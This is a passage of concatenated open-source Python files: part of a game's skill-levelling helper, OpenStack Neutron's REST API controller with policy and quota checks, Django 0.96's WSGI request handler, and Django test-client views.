    for attr in ('hit_percentage', 'critical_percentage', 'critical_multipler',
                 'energy_cost', 'number_of_dice', 'dice_sides', 'bonus'):
        setattr(player_skill, attr, getattr(skill, attr))
    # Countdown of uses until the skill levels up.
    player_skill.remaining_for_level_up = skill.gain_frequency
    player_skill.save()
    return player_skill
def level_skill(player_skill):
    """Consume one use toward a level-up; apply gains when the counter hits 0.

    Returns True when the skill leveled up, False otherwise.  The record is
    saved in either case.
    """
    player_skill.remaining_for_level_up -= 1
    leveled_up = player_skill.remaining_for_level_up == 0
    if leveled_up:
        template = player_skill.skill
        player_skill.level += 1
        player_skill.hit_percentage += template.gained_hit
        player_skill.critical_percentage += template.gained_critical
        player_skill.critical_multipler += template.gained_critical_multipler
        player_skill.energy_cost += template.gained_energy_cost
        player_skill.bonus += template.gained_bonus
        # Reset the countdown for the next level.
        player_skill.remaining_for_level_up = template.gain_frequency
    player_skill.save()
    return leveled_up
| bsd-3-clause |
virtualopensystems/neutron | neutron/api/v2/base.py | 5 | 31187 | # Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import netaddr
import webob.exc
from oslo.config import cfg
from neutron.api import api_common
from neutron.api.rpc.agentnotifiers import dhcp_rpc_agent_api
from neutron.api.v2 import attributes
from neutron.api.v2 import resource as wsgi_resource
from neutron.common import constants as const
from neutron.common import exceptions
from neutron.common import rpc as n_rpc
from neutron.openstack.common import log as logging
from neutron import policy
from neutron import quota
LOG = logging.getLogger(__name__)
FAULT_MAP = {exceptions.NotFound: webob.exc.HTTPNotFound,
exceptions.Conflict: webob.exc.HTTPConflict,
exceptions.InUse: webob.exc.HTTPConflict,
exceptions.BadRequest: webob.exc.HTTPBadRequest,
exceptions.ServiceUnavailable: webob.exc.HTTPServiceUnavailable,
exceptions.NotAuthorized: webob.exc.HTTPForbidden,
netaddr.AddrFormatError: webob.exc.HTTPBadRequest,
}
class Controller(object):
LIST = 'list'
SHOW = 'show'
CREATE = 'create'
UPDATE = 'update'
DELETE = 'delete'
def __init__(self, plugin, collection, resource, attr_info,
allow_bulk=False, member_actions=None, parent=None,
allow_pagination=False, allow_sorting=False):
if member_actions is None:
member_actions = []
self._plugin = plugin
self._collection = collection.replace('-', '_')
self._resource = resource.replace('-', '_')
self._attr_info = attr_info
self._allow_bulk = allow_bulk
self._allow_pagination = allow_pagination
self._allow_sorting = allow_sorting
self._native_bulk = self._is_native_bulk_supported()
self._native_pagination = self._is_native_pagination_supported()
self._native_sorting = self._is_native_sorting_supported()
self._policy_attrs = [name for (name, info) in self._attr_info.items()
if info.get('required_by_policy')]
self._notifier = n_rpc.get_notifier('network')
# use plugin's dhcp notifier, if this is already instantiated
agent_notifiers = getattr(plugin, 'agent_notifiers', {})
self._dhcp_agent_notifier = (
agent_notifiers.get(const.AGENT_TYPE_DHCP) or
dhcp_rpc_agent_api.DhcpAgentNotifyAPI()
)
if cfg.CONF.notify_nova_on_port_data_changes:
from neutron.notifiers import nova
self._nova_notifier = nova.Notifier()
self._member_actions = member_actions
self._primary_key = self._get_primary_key()
if self._allow_pagination and self._native_pagination:
# Native pagination need native sorting support
if not self._native_sorting:
raise exceptions.Invalid(
_("Native pagination depend on native sorting")
)
if not self._allow_sorting:
LOG.info(_("Allow sorting is enabled because native "
"pagination requires native sorting"))
self._allow_sorting = True
if parent:
self._parent_id_name = '%s_id' % parent['member_name']
parent_part = '_%s' % parent['member_name']
else:
self._parent_id_name = None
parent_part = ''
self._plugin_handlers = {
self.LIST: 'get%s_%s' % (parent_part, self._collection),
self.SHOW: 'get%s_%s' % (parent_part, self._resource)
}
for action in [self.CREATE, self.UPDATE, self.DELETE]:
self._plugin_handlers[action] = '%s%s_%s' % (action, parent_part,
self._resource)
def _get_primary_key(self, default_primary_key='id'):
for key, value in self._attr_info.iteritems():
if value.get('primary_key', False):
return key
return default_primary_key
def _is_native_bulk_supported(self):
native_bulk_attr_name = ("_%s__native_bulk_support"
% self._plugin.__class__.__name__)
return getattr(self._plugin, native_bulk_attr_name, False)
def _is_native_pagination_supported(self):
native_pagination_attr_name = ("_%s__native_pagination_support"
% self._plugin.__class__.__name__)
return getattr(self._plugin, native_pagination_attr_name, False)
def _is_native_sorting_supported(self):
native_sorting_attr_name = ("_%s__native_sorting_support"
% self._plugin.__class__.__name__)
return getattr(self._plugin, native_sorting_attr_name, False)
def _exclude_attributes_by_policy(self, context, data):
"""Identifies attributes to exclude according to authZ policies.
Return a list of attribute names which should be stripped from the
response returned to the user because the user is not authorized
to see them.
"""
attributes_to_exclude = []
for attr_name in data.keys():
attr_data = self._attr_info.get(attr_name)
if attr_data and attr_data['is_visible']:
if policy.check(
context,
'%s:%s' % (self._plugin_handlers[self.SHOW], attr_name),
data,
might_not_exist=True):
# this attribute is visible, check next one
continue
# if the code reaches this point then either the policy check
# failed or the attribute was not visible in the first place
attributes_to_exclude.append(attr_name)
return attributes_to_exclude
def _view(self, context, data, fields_to_strip=None):
"""Build a view of an API resource.
:param context: the neutron context
:param data: the object for which a view is being created
:param fields_to_strip: attributes to remove from the view
:returns: a view of the object which includes only attributes
visible according to API resource declaration and authZ policies.
"""
fields_to_strip = ((fields_to_strip or []) +
self._exclude_attributes_by_policy(context, data))
return self._filter_attributes(context, data, fields_to_strip)
def _filter_attributes(self, context, data, fields_to_strip=None):
if not fields_to_strip:
return data
return dict(item for item in data.iteritems()
if (item[0] not in fields_to_strip))
def _do_field_list(self, original_fields):
fields_to_add = None
# don't do anything if fields were not specified in the request
if original_fields:
fields_to_add = [attr for attr in self._policy_attrs
if attr not in original_fields]
original_fields.extend(self._policy_attrs)
return original_fields, fields_to_add
def __getattr__(self, name):
if name in self._member_actions:
def _handle_action(request, id, **kwargs):
arg_list = [request.context, id]
# Ensure policy engine is initialized
policy.init()
# Fetch the resource and verify if the user can access it
try:
resource = self._item(request, id, True)
except exceptions.PolicyNotAuthorized:
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
body = kwargs.pop('body', None)
# Explicit comparison with None to distinguish from {}
if body is not None:
arg_list.append(body)
# It is ok to raise a 403 because accessibility to the
# object was checked earlier in this method
policy.enforce(request.context, name, resource)
return getattr(self._plugin, name)(*arg_list, **kwargs)
return _handle_action
else:
raise AttributeError
def _get_pagination_helper(self, request):
if self._allow_pagination and self._native_pagination:
return api_common.PaginationNativeHelper(request,
self._primary_key)
elif self._allow_pagination:
return api_common.PaginationEmulatedHelper(request,
self._primary_key)
return api_common.NoPaginationHelper(request, self._primary_key)
def _get_sorting_helper(self, request):
if self._allow_sorting and self._native_sorting:
return api_common.SortingNativeHelper(request, self._attr_info)
elif self._allow_sorting:
return api_common.SortingEmulatedHelper(request, self._attr_info)
return api_common.NoSortingHelper(request, self._attr_info)
def _items(self, request, do_authz=False, parent_id=None):
"""Retrieves and formats a list of elements of the requested entity."""
# NOTE(salvatore-orlando): The following ensures that fields which
# are needed for authZ policy validation are not stripped away by the
# plugin before returning.
original_fields, fields_to_add = self._do_field_list(
api_common.list_args(request, 'fields'))
filters = api_common.get_filters(request, self._attr_info,
['fields', 'sort_key', 'sort_dir',
'limit', 'marker', 'page_reverse'])
kwargs = {'filters': filters,
'fields': original_fields}
sorting_helper = self._get_sorting_helper(request)
pagination_helper = self._get_pagination_helper(request)
sorting_helper.update_args(kwargs)
sorting_helper.update_fields(original_fields, fields_to_add)
pagination_helper.update_args(kwargs)
pagination_helper.update_fields(original_fields, fields_to_add)
if parent_id:
kwargs[self._parent_id_name] = parent_id
obj_getter = getattr(self._plugin, self._plugin_handlers[self.LIST])
obj_list = obj_getter(request.context, **kwargs)
obj_list = sorting_helper.sort(obj_list)
obj_list = pagination_helper.paginate(obj_list)
# Check authz
if do_authz:
# FIXME(salvatore-orlando): obj_getter might return references to
# other resources. Must check authZ on them too.
# Omit items from list that should not be visible
obj_list = [obj for obj in obj_list
if policy.check(request.context,
self._plugin_handlers[self.SHOW],
obj,
plugin=self._plugin)]
# Use the first element in the list for discriminating which attributes
# should be filtered out because of authZ policies
# fields_to_add contains a list of attributes added for request policy
# checks but that were not required by the user. They should be
# therefore stripped
fields_to_strip = fields_to_add or []
if obj_list:
fields_to_strip += self._exclude_attributes_by_policy(
request.context, obj_list[0])
collection = {self._collection:
[self._filter_attributes(
request.context, obj,
fields_to_strip=fields_to_strip)
for obj in obj_list]}
pagination_links = pagination_helper.get_links(obj_list)
if pagination_links:
collection[self._collection + "_links"] = pagination_links
return collection
def _item(self, request, id, do_authz=False, field_list=None,
parent_id=None):
"""Retrieves and formats a single element of the requested entity."""
kwargs = {'fields': field_list}
action = self._plugin_handlers[self.SHOW]
if parent_id:
kwargs[self._parent_id_name] = parent_id
obj_getter = getattr(self._plugin, action)
obj = obj_getter(request.context, id, **kwargs)
# Check authz
# FIXME(salvatore-orlando): obj_getter might return references to
# other resources. Must check authZ on them too.
if do_authz:
policy.enforce(request.context, action, obj)
return obj
def _send_dhcp_notification(self, context, data, methodname):
if cfg.CONF.dhcp_agent_notification:
if self._collection in data:
for body in data[self._collection]:
item = {self._resource: body}
self._dhcp_agent_notifier.notify(context, item, methodname)
else:
self._dhcp_agent_notifier.notify(context, data, methodname)
def _send_nova_notification(self, action, orig, returned):
if hasattr(self, '_nova_notifier'):
self._nova_notifier.send_network_change(action, orig, returned)
def index(self, request, **kwargs):
"""Returns a list of the requested entity."""
parent_id = kwargs.get(self._parent_id_name)
# Ensure policy engine is initialized
policy.init()
return self._items(request, True, parent_id)
def show(self, request, id, **kwargs):
"""Returns detailed information about the requested entity."""
try:
# NOTE(salvatore-orlando): The following ensures that fields
# which are needed for authZ policy validation are not stripped
# away by the plugin before returning.
field_list, added_fields = self._do_field_list(
api_common.list_args(request, "fields"))
parent_id = kwargs.get(self._parent_id_name)
# Ensure policy engine is initialized
policy.init()
return {self._resource:
self._view(request.context,
self._item(request,
id,
do_authz=True,
field_list=field_list,
parent_id=parent_id),
fields_to_strip=added_fields)}
except exceptions.PolicyNotAuthorized:
# To avoid giving away information, pretend that it
# doesn't exist
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
def _emulate_bulk_create(self, obj_creator, request, body, parent_id=None):
objs = []
try:
for item in body[self._collection]:
kwargs = {self._resource: item}
if parent_id:
kwargs[self._parent_id_name] = parent_id
fields_to_strip = self._exclude_attributes_by_policy(
request.context, item)
objs.append(self._filter_attributes(
request.context,
obj_creator(request.context, **kwargs),
fields_to_strip=fields_to_strip))
return objs
# Note(salvatore-orlando): broad catch as in theory a plugin
# could raise any kind of exception
except Exception as ex:
for obj in objs:
obj_deleter = getattr(self._plugin,
self._plugin_handlers[self.DELETE])
try:
kwargs = ({self._parent_id_name: parent_id} if parent_id
else {})
obj_deleter(request.context, obj['id'], **kwargs)
except Exception:
# broad catch as our only purpose is to log the exception
LOG.exception(_("Unable to undo add for "
"%(resource)s %(id)s"),
{'resource': self._resource,
'id': obj['id']})
# TODO(salvatore-orlando): The object being processed when the
# plugin raised might have been created or not in the db.
# We need a way for ensuring that if it has been created,
# it is then deleted
raise ex
def create(self, request, body=None, **kwargs):
"""Creates a new instance of the requested entity."""
parent_id = kwargs.get(self._parent_id_name)
self._notifier.info(request.context,
self._resource + '.create.start',
body)
body = Controller.prepare_request_body(request.context, body, True,
self._resource, self._attr_info,
allow_bulk=self._allow_bulk)
action = self._plugin_handlers[self.CREATE]
# Check authz
if self._collection in body:
# Have to account for bulk create
items = body[self._collection]
deltas = {}
bulk = True
else:
items = [body]
bulk = False
# Ensure policy engine is initialized
policy.init()
for item in items:
self._validate_network_tenant_ownership(request,
item[self._resource])
policy.enforce(request.context,
action,
item[self._resource])
try:
tenant_id = item[self._resource]['tenant_id']
count = quota.QUOTAS.count(request.context, self._resource,
self._plugin, self._collection,
tenant_id)
if bulk:
delta = deltas.get(tenant_id, 0) + 1
deltas[tenant_id] = delta
else:
delta = 1
kwargs = {self._resource: count + delta}
except exceptions.QuotaResourceUnknown as e:
# We don't want to quota this resource
LOG.debug(e)
else:
quota.QUOTAS.limit_check(request.context,
item[self._resource]['tenant_id'],
**kwargs)
def notify(create_result):
notifier_method = self._resource + '.create.end'
self._notifier.info(request.context,
notifier_method,
create_result)
self._send_dhcp_notification(request.context,
create_result,
notifier_method)
return create_result
kwargs = {self._parent_id_name: parent_id} if parent_id else {}
if self._collection in body and self._native_bulk:
# plugin does atomic bulk create operations
obj_creator = getattr(self._plugin, "%s_bulk" % action)
objs = obj_creator(request.context, body, **kwargs)
# Use first element of list to discriminate attributes which
# should be removed because of authZ policies
fields_to_strip = self._exclude_attributes_by_policy(
request.context, objs[0])
return notify({self._collection: [self._filter_attributes(
request.context, obj, fields_to_strip=fields_to_strip)
for obj in objs]})
else:
obj_creator = getattr(self._plugin, action)
if self._collection in body:
# Emulate atomic bulk behavior
objs = self._emulate_bulk_create(obj_creator, request,
body, parent_id)
return notify({self._collection: objs})
else:
kwargs.update({self._resource: body})
obj = obj_creator(request.context, **kwargs)
self._send_nova_notification(action, {},
{self._resource: obj})
return notify({self._resource: self._view(request.context,
obj)})
def delete(self, request, id, **kwargs):
"""Deletes the specified entity."""
self._notifier.info(request.context,
self._resource + '.delete.start',
{self._resource + '_id': id})
action = self._plugin_handlers[self.DELETE]
# Check authz
policy.init()
parent_id = kwargs.get(self._parent_id_name)
obj = self._item(request, id, parent_id=parent_id)
try:
policy.enforce(request.context,
action,
obj)
except exceptions.PolicyNotAuthorized:
# To avoid giving away information, pretend that it
# doesn't exist
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
obj_deleter = getattr(self._plugin, action)
obj_deleter(request.context, id, **kwargs)
notifier_method = self._resource + '.delete.end'
self._notifier.info(request.context,
notifier_method,
{self._resource + '_id': id})
result = {self._resource: self._view(request.context, obj)}
self._send_nova_notification(action, {}, result)
self._send_dhcp_notification(request.context,
result,
notifier_method)
def update(self, request, id, body=None, **kwargs):
"""Updates the specified entity's attributes."""
parent_id = kwargs.get(self._parent_id_name)
try:
payload = body.copy()
except AttributeError:
msg = _("Invalid format: %s") % request.body
raise exceptions.BadRequest(resource='body', msg=msg)
payload['id'] = id
self._notifier.info(request.context,
self._resource + '.update.start',
payload)
body = Controller.prepare_request_body(request.context, body, False,
self._resource, self._attr_info,
allow_bulk=self._allow_bulk)
action = self._plugin_handlers[self.UPDATE]
# Load object to check authz
# but pass only attributes in the original body and required
# by the policy engine to the policy 'brain'
field_list = [name for (name, value) in self._attr_info.iteritems()
if (value.get('required_by_policy') or
value.get('primary_key') or
'default' not in value)]
# Ensure policy engine is initialized
policy.init()
orig_obj = self._item(request, id, field_list=field_list,
parent_id=parent_id)
orig_object_copy = copy.copy(orig_obj)
orig_obj.update(body[self._resource])
try:
policy.enforce(request.context,
action,
orig_obj)
except exceptions.PolicyNotAuthorized:
# To avoid giving away information, pretend that it
# doesn't exist
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
obj_updater = getattr(self._plugin, action)
kwargs = {self._resource: body}
if parent_id:
kwargs[self._parent_id_name] = parent_id
obj = obj_updater(request.context, id, **kwargs)
result = {self._resource: self._view(request.context, obj)}
notifier_method = self._resource + '.update.end'
self._notifier.info(request.context, notifier_method, result)
self._send_dhcp_notification(request.context,
result,
notifier_method)
self._send_nova_notification(action, orig_object_copy, result)
return result
@staticmethod
def _populate_tenant_id(context, res_dict, is_create):
if (('tenant_id' in res_dict and
res_dict['tenant_id'] != context.tenant_id and
not context.is_admin)):
msg = _("Specifying 'tenant_id' other than authenticated "
"tenant in request requires admin privileges")
raise webob.exc.HTTPBadRequest(msg)
if is_create and 'tenant_id' not in res_dict:
if context.tenant_id:
res_dict['tenant_id'] = context.tenant_id
else:
msg = _("Running without keystone AuthN requires "
" that tenant_id is specified")
raise webob.exc.HTTPBadRequest(msg)
@staticmethod
def prepare_request_body(context, body, is_create, resource, attr_info,
allow_bulk=False):
"""Verifies required attributes are in request body.
Also checking that an attribute is only specified if it is allowed
for the given operation (create/update).
Attribute with default values are considered to be optional.
body argument must be the deserialized body.
"""
collection = resource + "s"
if not body:
raise webob.exc.HTTPBadRequest(_("Resource body required"))
LOG.debug(_("Request body: %(body)s"), {'body': body})
prep_req_body = lambda x: Controller.prepare_request_body(
context,
x if resource in x else {resource: x},
is_create,
resource,
attr_info,
allow_bulk)
if collection in body:
if not allow_bulk:
raise webob.exc.HTTPBadRequest(_("Bulk operation "
"not supported"))
bulk_body = [prep_req_body(item) for item in body[collection]]
if not bulk_body:
raise webob.exc.HTTPBadRequest(_("Resources required"))
return {collection: bulk_body}
res_dict = body.get(resource)
if res_dict is None:
msg = _("Unable to find '%s' in request body") % resource
raise webob.exc.HTTPBadRequest(msg)
Controller._populate_tenant_id(context, res_dict, is_create)
Controller._verify_attributes(res_dict, attr_info)
if is_create: # POST
for attr, attr_vals in attr_info.iteritems():
if attr_vals['allow_post']:
if ('default' not in attr_vals and
attr not in res_dict):
msg = _("Failed to parse request. Required "
"attribute '%s' not specified") % attr
raise webob.exc.HTTPBadRequest(msg)
res_dict[attr] = res_dict.get(attr,
attr_vals.get('default'))
else:
if attr in res_dict:
msg = _("Attribute '%s' not allowed in POST") % attr
raise webob.exc.HTTPBadRequest(msg)
else: # PUT
for attr, attr_vals in attr_info.iteritems():
if attr in res_dict and not attr_vals['allow_put']:
msg = _("Cannot update read-only attribute %s") % attr
raise webob.exc.HTTPBadRequest(msg)
for attr, attr_vals in attr_info.iteritems():
if (attr not in res_dict or
res_dict[attr] is attributes.ATTR_NOT_SPECIFIED):
continue
# Convert values if necessary
if 'convert_to' in attr_vals:
res_dict[attr] = attr_vals['convert_to'](res_dict[attr])
# Check that configured values are correct
if 'validate' not in attr_vals:
continue
for rule in attr_vals['validate']:
res = attributes.validators[rule](res_dict[attr],
attr_vals['validate'][rule])
if res:
msg_dict = dict(attr=attr, reason=res)
msg = _("Invalid input for %(attr)s. "
"Reason: %(reason)s.") % msg_dict
raise webob.exc.HTTPBadRequest(msg)
return body
@staticmethod
def _verify_attributes(res_dict, attr_info):
extra_keys = set(res_dict.keys()) - set(attr_info.keys())
if extra_keys:
msg = _("Unrecognized attribute(s) '%s'") % ', '.join(extra_keys)
raise webob.exc.HTTPBadRequest(msg)
def _validate_network_tenant_ownership(self, request, resource_item):
# TODO(salvatore-orlando): consider whether this check can be folded
# in the policy engine
if (request.context.is_admin or
self._resource not in ('port', 'subnet')):
return
network = self._plugin.get_network(
request.context,
resource_item['network_id'])
# do not perform the check on shared networks
if network.get('shared'):
return
network_owner = network['tenant_id']
if network_owner != resource_item['tenant_id']:
msg = _("Tenant %(tenant_id)s not allowed to "
"create %(resource)s on this network")
raise webob.exc.HTTPForbidden(msg % {
"tenant_id": resource_item['tenant_id'],
"resource": self._resource,
})
def create_resource(collection, resource, plugin, params, allow_bulk=False,
                    member_actions=None, parent=None, allow_pagination=False,
                    allow_sorting=False):
    """Build a WSGI resource wrapping a Controller for the given entity."""
    controller = Controller(
        plugin, collection, resource, params, allow_bulk,
        member_actions=member_actions,
        parent=parent,
        allow_pagination=allow_pagination,
        allow_sorting=allow_sorting)
    # FAULT_MAP translates neutron exceptions into HTTP error responses.
    return wsgi_resource.Resource(controller, FAULT_MAP)
| apache-2.0 |
ProfessionalIT/professionalit-webiste | sdk/google_appengine/lib/django-0.96/django/core/handlers/wsgi.py | 32 | 7022 | from django.core.handlers.base import BaseHandler
from django.core import signals
from django.dispatch import dispatcher
from django.utils import datastructures
from django import http
from pprint import pformat
from shutil import copyfileobj
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# See http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
STATUS_CODE_TEXT = {
100: 'CONTINUE',
101: 'SWITCHING PROTOCOLS',
200: 'OK',
201: 'CREATED',
202: 'ACCEPTED',
203: 'NON-AUTHORITATIVE INFORMATION',
204: 'NO CONTENT',
205: 'RESET CONTENT',
206: 'PARTIAL CONTENT',
300: 'MULTIPLE CHOICES',
301: 'MOVED PERMANENTLY',
302: 'FOUND',
303: 'SEE OTHER',
304: 'NOT MODIFIED',
305: 'USE PROXY',
306: 'RESERVED',
307: 'TEMPORARY REDIRECT',
400: 'BAD REQUEST',
401: 'UNAUTHORIZED',
402: 'PAYMENT REQUIRED',
403: 'FORBIDDEN',
404: 'NOT FOUND',
405: 'METHOD NOT ALLOWED',
406: 'NOT ACCEPTABLE',
407: 'PROXY AUTHENTICATION REQUIRED',
408: 'REQUEST TIMEOUT',
409: 'CONFLICT',
410: 'GONE',
411: 'LENGTH REQUIRED',
412: 'PRECONDITION FAILED',
413: 'REQUEST ENTITY TOO LARGE',
414: 'REQUEST-URI TOO LONG',
415: 'UNSUPPORTED MEDIA TYPE',
416: 'REQUESTED RANGE NOT SATISFIABLE',
417: 'EXPECTATION FAILED',
500: 'INTERNAL SERVER ERROR',
501: 'NOT IMPLEMENTED',
502: 'BAD GATEWAY',
503: 'SERVICE UNAVAILABLE',
504: 'GATEWAY TIMEOUT',
505: 'HTTP VERSION NOT SUPPORTED',
}
def safe_copyfileobj(fsrc, fdst, length=16*1024, size=0):
    """
    A version of shutil.copyfileobj that will not read more than 'size' bytes.
    This makes it safe from clients sending more than CONTENT_LENGTH bytes of
    data in the body.
    """
    remaining = size
    if not remaining:
        return
    while remaining > 0:
        chunk = fsrc.read(min(length, remaining))
        if not chunk:
            # Source exhausted before the limit was reached.
            return
        fdst.write(chunk)
        remaining -= len(chunk)
class WSGIRequest(http.HttpRequest):
def __init__(self, environ):
self.environ = environ
self.path = environ['PATH_INFO']
self.META = environ
self.method = environ['REQUEST_METHOD'].upper()
def __repr__(self):
# Since this is called as part of error handling, we need to be very
# robust against potentially malformed input.
try:
get = pformat(self.GET)
except:
get = '<could not parse>'
try:
post = pformat(self.POST)
except:
post = '<could not parse>'
try:
cookies = pformat(self.COOKIES)
except:
cookies = '<could not parse>'
try:
meta = pformat(self.META)
except:
meta = '<could not parse>'
return '<WSGIRequest\nGET:%s,\nPOST:%s,\nCOOKIES:%s,\nMETA:%s>' % \
(get, post, cookies, meta)
def get_full_path(self):
return '%s%s' % (self.path, self.environ.get('QUERY_STRING', '') and ('?' + self.environ.get('QUERY_STRING', '')) or '')
def is_secure(self):
return self.environ.has_key('HTTPS') and self.environ['HTTPS'] == 'on'
def _load_post_and_files(self):
# Populates self._post and self._files
if self.method == 'POST':
if self.environ.get('CONTENT_TYPE', '').startswith('multipart'):
header_dict = dict([(k, v) for k, v in self.environ.items() if k.startswith('HTTP_')])
header_dict['Content-Type'] = self.environ.get('CONTENT_TYPE', '')
self._post, self._files = http.parse_file_upload(header_dict, self.raw_post_data)
else:
self._post, self._files = http.QueryDict(self.raw_post_data), datastructures.MultiValueDict()
else:
self._post, self._files = http.QueryDict(''), datastructures.MultiValueDict()
def _get_request(self):
if not hasattr(self, '_request'):
self._request = datastructures.MergeDict(self.POST, self.GET)
return self._request
def _get_get(self):
if not hasattr(self, '_get'):
# The WSGI spec says 'QUERY_STRING' may be absent.
self._get = http.QueryDict(self.environ.get('QUERY_STRING', ''))
return self._get
def _set_get(self, get):
self._get = get
def _get_post(self):
if not hasattr(self, '_post'):
self._load_post_and_files()
return self._post
def _set_post(self, post):
self._post = post
def _get_cookies(self):
if not hasattr(self, '_cookies'):
self._cookies = http.parse_cookie(self.environ.get('HTTP_COOKIE', ''))
return self._cookies
def _set_cookies(self, cookies):
self._cookies = cookies
def _get_files(self):
if not hasattr(self, '_files'):
self._load_post_and_files()
return self._files
def _get_raw_post_data(self):
try:
return self._raw_post_data
except AttributeError:
buf = StringIO()
try:
# CONTENT_LENGTH might be absent if POST doesn't have content at all (lighttpd)
content_length = int(self.environ.get('CONTENT_LENGTH', 0))
except ValueError: # if CONTENT_LENGTH was empty string or not an integer
content_length = 0
safe_copyfileobj(self.environ['wsgi.input'], buf, size=content_length)
self._raw_post_data = buf.getvalue()
buf.close()
return self._raw_post_data
GET = property(_get_get, _set_get)
POST = property(_get_post, _set_post)
COOKIES = property(_get_cookies, _set_cookies)
FILES = property(_get_files)
REQUEST = property(_get_request)
raw_post_data = property(_get_raw_post_data)
class WSGIHandler(BaseHandler):
    """WSGI application object: adapt each (environ, start_response) call
    into one Django request/response cycle."""

    def __call__(self, environ, start_response):
        # NOTE(review): `settings` looks unused here; possibly imported for the
        # side effect of forcing settings configuration -- confirm.
        from django.conf import settings

        # Set up middleware if needed. We couldn't do this earlier, because
        # settings weren't available.
        if self._request_middleware is None:
            self.load_middleware()

        # request_started/request_finished bracket the cycle; the try/finally
        # guarantees request_finished fires even if the view raises.
        dispatcher.send(signal=signals.request_started)
        try:
            request = WSGIRequest(environ)
            response = self.get_response(request)

            # Apply response middleware
            for middleware_method in self._response_middleware:
                response = middleware_method(request, response)
        finally:
            dispatcher.send(signal=signals.request_finished)

        try:
            status_text = STATUS_CODE_TEXT[response.status_code]
        except KeyError:
            status_text = 'UNKNOWN STATUS CODE'
        status = '%s %s' % (response.status_code, status_text)
        response_headers = response.headers.items()
        # Each cookie becomes its own Set-Cookie header; header='' drops the
        # "Set-Cookie:" prefix Morsel.output() would otherwise include.
        for c in response.cookies.values():
            response_headers.append(('Set-Cookie', c.output(header='')))
        start_response(status, response_headers)
        return response
| lgpl-3.0 |
kalahbrown/HueBigSQL | desktop/core/ext-py/Django-1.6.10/tests/test_client/views.py | 51 | 9661 | from xml.dom.minidom import parseString
from django.contrib.auth.decorators import login_required, permission_required
from django.core import mail
from django.forms import fields
from django.forms.forms import Form, ValidationError
from django.forms.formsets import formset_factory, BaseFormSet
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound
from django.shortcuts import render_to_response
from django.template import Context, Template
from django.utils.decorators import method_decorator
from django.utils.six.moves.urllib.parse import urlencode
def get_view(request):
    """Render a tiny template echoing the ``var`` query parameter (default 42)."""
    template = Template('This is a test. {{ var }} is the value.', name='GET Template')
    context = Context({'var': request.GET.get('var', 42)})
    return HttpResponse(template.render(context))
def post_view(request):
    """Render one of three templates depending on the method and on whether
    the POST carried any data."""
    if request.method != 'POST':
        template = Template('Viewing GET page.', name='Empty GET Template')
        context = Context()
    elif request.POST:
        template = Template('Data received: {{ data }} is the value.', name='POST Template')
        context = Context({'data': request.POST['value']})
    else:
        template = Template('Viewing POST page.', name='Empty POST Template')
        context = Context()
    return HttpResponse(template.render(context))
def view_with_header(request):
    """Respond with an empty body plus a custom X-DJANGO-TEST header."""
    response = HttpResponse()
    response['X-DJANGO-TEST'] = 'Slartibartfast'
    return response
def raw_post_view(request):
    """A view which expects raw XML to be posted and returns content extracted
    from the XML"""
    if request.method == 'POST':
        root = parseString(request.body)
        # Assumes a document shaped like <books><book><title/><author/></book>...
        # and only inspects the first book -- TODO confirm against the tests
        # that exercise this view.
        first_book = root.firstChild.firstChild
        title, author = [n.firstChild.nodeValue for n in first_book.childNodes]
        t = Template("{{ title }} - {{ author }}", name="Book template")
        c = Context({"title": title, "author": author})
    else:
        t = Template("GET request.", name="Book GET template")
        c = Context()
    return HttpResponse(t.render(c))
def redirect_view(request):
    """Bounce every request over to the GET view, forwarding any query string."""
    query = '?' + urlencode(request.GET, True) if request.GET else ''
    return HttpResponseRedirect('/test_client/get_view/' + query)
def view_with_secure(request):
    """Respond with an empty body, recording request.is_secure() on the
    response so tests can inspect it."""
    response = HttpResponse()
    response.test_was_secure_request = request.is_secure()
    return response
def double_redirect_view(request):
    """Redirect to a view that itself redirects (tests redirect chains)."""
    return HttpResponseRedirect('/test_client/permanent_redirect_view/')
def bad_view(request):
    """Return a 404 whose body contains marker text the tests search for."""
    return HttpResponseNotFound('Not found!. This page contains some MAGIC content')
# Fixed (value, label) pairs shared by the single- and multi-choice fields
# on TestForm below.
TestChoices = (
    ('a', 'First Choice'),
    ('b', 'Second Choice'),
    ('c', 'Third Choice'),
    ('d', 'Fourth Choice'),
    ('e', 'Fifth Choice')
)
class TestForm(Form):
    """Form exercising several field types plus a form-level (non-field) error."""
    text = fields.CharField()
    email = fields.EmailField()
    value = fields.IntegerField()
    single = fields.ChoiceField(choices=TestChoices)
    multi = fields.MultipleChoiceField(choices=TestChoices)

    def clean(self):
        cleaned_data = self.cleaned_data
        # Magic input value lets tests trigger a non-field error on demand.
        if cleaned_data.get("text") == "Raise non-field error":
            raise ValidationError("Non-field error.")
        return cleaned_data
def form_view(request):
    """Bind TestForm to the request data and report its validation state."""
    if request.method == 'POST':
        form = TestForm(request.POST)
        if form.is_valid():
            template = Template('Valid POST data.', name='Valid POST Template')
            context = Context()
        else:
            template = Template('Invalid POST data. {{ form.errors }}', name='Invalid POST Template')
            context = Context({'form': form})
    else:
        form = TestForm(request.GET)
        template = Template('Viewing base form. {{ form }}.', name='Form GET Template')
        context = Context({'form': form})
    return HttpResponse(template.render(context))
def form_view_with_template(request):
    """Like form_view, but renders the result through an on-disk template."""
    if request.method == 'POST':
        form = TestForm(request.POST)
        message = 'POST data OK' if form.is_valid() else 'POST data has errors'
    else:
        form = TestForm()
        message = 'GET form page'
    return render_to_response('form_view.html', {'form': form, 'message': message})
class BaseTestFormSet(BaseFormSet):
    """Formset that additionally rejects duplicate email addresses."""

    def clean(self):
        """Raise unless every form in the set has a distinct email address."""
        if any(self.errors):
            # Don't bother with cross-form validation while individual
            # forms are still invalid.
            return
        seen = set()
        for form in self.forms:
            email = form.cleaned_data['email']
            if email in seen:
